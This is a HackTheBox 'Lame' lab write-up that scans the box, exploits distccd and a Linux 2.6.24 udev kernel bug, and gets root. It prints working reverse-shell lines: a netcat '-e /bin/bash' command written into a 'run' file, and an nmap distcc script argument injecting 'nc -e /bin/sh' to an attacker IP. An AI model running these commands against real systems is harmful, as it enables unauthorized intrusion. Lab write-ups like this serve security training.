HackTheBox - Lame write-up
This is an Easy box from HTB Labs. Lame is running multiple vulnerable services through which you can get access to the system. Let's start cracking!!!
Nmap Scanning Results
sudo nmap -sV -A 10.10.10.3
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|_  Workgroup: WORKGROUP\x00
So distccd v1 (GNU 4.2.4) and Samba 3.0.20 are running on the remote machine. After a quick search on Metasploit and Google, both services turned out to be vulnerable, with public exploits available.
Exploitation (with Metasploit)
I was curious about this service from the start and wanted to dig more. A distccd module is also available in Metasploit, so let's exploit it. It worked, but we got a limited shell: we are in as the daemon service account, not as root or a standard user. Let's find a way to escalate privileges.
Next, find out the Linux kernel and OS version running on the machine.
The remote server's kernel, Linux 2.6.24-16-server, was found to be vulnerable.
Now download the exploit to the local machine:
COMMAND: wget http://www.exploit-db.com/download/8572
Move it to "/var/www/html" and change its permissions. Start the Apache web server on your local attacking machine:
COMMAND: service apache2 start
Download the exploit into the remote machine's /tmp folder and compile 8572.c:
COMMAND: gcc 8572.c -o exploit
Now we need to create a file called "run" in /tmp, because the exploit executes the "run" file:
COMMANDS: echo '#!/bin/bash' > run
echo '/bin/netcat -e /bin/bash 10.10.10.15 1234' >> run
Run the following to find the PID of udevd:
COMMAND: cat /proc/net/netlink
Start a listener on the local machine and execute the exploit with the PID of udevd. Got r00t!!!!
To test, first we run:
COMMAND: nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='id'"
We got the uid and gid info back, meaning this script is working. Now we can go ahead and get a root shell.
COMMAND: nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='nc -e /bin/sh 10.10.15.102 1234'"
Now grab the flags. This was an easy box, and the privilege escalation part was the interesting bit here.